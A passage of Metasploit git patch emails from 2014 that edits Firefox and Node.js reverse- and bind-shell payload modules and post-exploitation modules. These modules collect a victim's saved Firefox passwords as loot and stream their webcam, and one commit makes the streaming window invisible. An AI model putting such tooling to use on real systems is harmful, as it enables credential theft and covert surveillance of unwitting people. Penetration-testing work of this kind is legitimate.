'msf/core/handler/reverse_tcp_ssl' -require 'msf/base/sessions/command_shell' -require 'msf/base/sessions/command_shell_options' - -module Metasploit3 - - include Msf::Payload::Single - include Msf::Payload::Firefox - include Msf::Sessions::CommandShellOptions - - def initialize(info={}) - super(merge_info(info, - 'Name' => 'Command Shell, Reverse TCP SSL (via Firefox XPCOM script)', - 'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API}, - 'Author' => ['joev'], - 'License' => BSD_LICENSE, - 'Platform' => 'firefox', - 'Arch' => ARCH_FIREFOX, - 'Handler' => Msf::Handler::ReverseTcpSsl, - 'Session' => Msf::Sessions::CommandShell, - 'PayloadType' => 'firefox' - )) - end - - def generate - # reverse_connect(:ssl => true) - "" - end - -end diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index c6aa8cba84..5e14658ae1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -30,6 +30,13 @@ module Metasploit3 )) end + # + # Constructs the payload + # + def generate + super + command_string + end + # # Returns the JS string to use for execution # From 496be5c3365f91e772a801f8229fceb2a6222ed7 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:26:45 -0500 Subject: [PATCH 504/853] Ensure command_shell_options is present. --- modules/payloads/singles/firefox/shell_bind_tcp.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index 1312b3c3fe..377c25a624 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -6,6 +6,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' module Metasploit3 From a45a5631f5080b6dce12ddc3129eea5011bd5f04 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:40:55 -0500 Subject: [PATCH 505/853] Make window invisible. --- modules/post/firefox/gather/passwords.rb | 8 ++++++-- modules/post/firefox/gather/webcam_chat.rb | 2 +- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index 24130d0f4e..819ac3c81b 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -37,8 +37,12 @@ class Metasploit3 < Msf::Post entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) } end - file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json) - print_good("Saved #{passwords.length} passwords to #{file}") + if passwords.length > 0 + file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json) + print_good("Saved #{passwords.length} passwords to #{file}") + else + print_warning("No passwords were found in Firefox.") + end rescue JSON::ParserError => e print_warning(results) end diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index c90ef06a86..104dfddd20 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Post var html = "#{Rex::Text.encode_base64(interface)}"; var url = #{url}; - AppShellService.hiddenDOMWindow.openDialog(url, 'xxx'); + AppShellService.hiddenDOMWindow.open(url, '_self'); send("Streaming webcam..."); } catch (e) { From a33de66da4d475a2cbf30918f77768654a08f49a Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:52:00 -0500 Subject: [PATCH 506/853] Fix transparent background, add VISIBLE option. --- data/webcam/offerer.html | 4 ++++ modules/post/firefox/gather/webcam_chat.rb | 9 ++++++++- 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html index c52ddb244b..8bd7cb5a48 100644 --- a/data/webcam/offerer.html +++ b/data/webcam/offerer.html @@ -2,6 +2,10 @@ <head> <title>Video session